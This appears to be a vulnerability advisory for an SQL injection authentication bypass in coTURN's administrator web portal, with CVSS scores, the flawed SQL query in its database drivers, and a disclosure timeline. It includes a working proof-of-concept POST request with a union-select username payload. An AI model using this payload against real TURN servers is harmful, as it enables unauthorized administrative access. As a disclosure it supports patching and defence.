CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
68.4%
An exploitable SQL injection vulnerability exists in the administrator web portal function of coTURN prior to version 4.5.0.9. A login message with a specially crafted username can cause an SQL injection, resulting in authentication bypass, which could give access to the TURN server administrator web portal. An attacker can log in via the external interface of the TURN server to trigger this vulnerability.
coTURN 4.5.0.5
<https://github.com/coturn/coturn>
9.1 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
CWE-89: Improper Neutralization of Special Elements used in an SQL Command (βSQL Injectionβ)
coTURN is an open-source implementation of TURN and STUN servers that can be used as a general-purpose networking traffic TURN server. TURN servers are usually deployed in so-called βDMZβ zones β any server reachable by the internet β to provide firewall traversal solutions. Attackers who are able to take over such servers may be able to bypass firewalls and conduct additional attacks.
According to Shodawn, thousands of coTURN servers are directly reachable on the internet.
The username in POST requests to the login page is passed to the following function in src/apps/relay/dbdrivers/dbd_mysql.c src/apps/relay/dbdrivers/dbd_pgsql.c src/apps/relay/dbdrivers/dbd_sqlite.c
snprintf(statement, sizeof(statement), "select realm,password from admin_user where name='%s'", usname);
The usname element can be crafted to return an arbitrary password.
Even when no administrators are configured and the administrator web portal is deactivated, the portal still accepts POST requests, so itβs still possible to exploit this vulnerability and reactivate the portal.
POST /logon HTTP/1.1
Host: 192.168.0.2:443
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
uname=user' union select '','0000'; --&pwd=0000
2017-09-04 - Vendor Disclosure
2019-01-29 - Public Disclosure
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
68.4%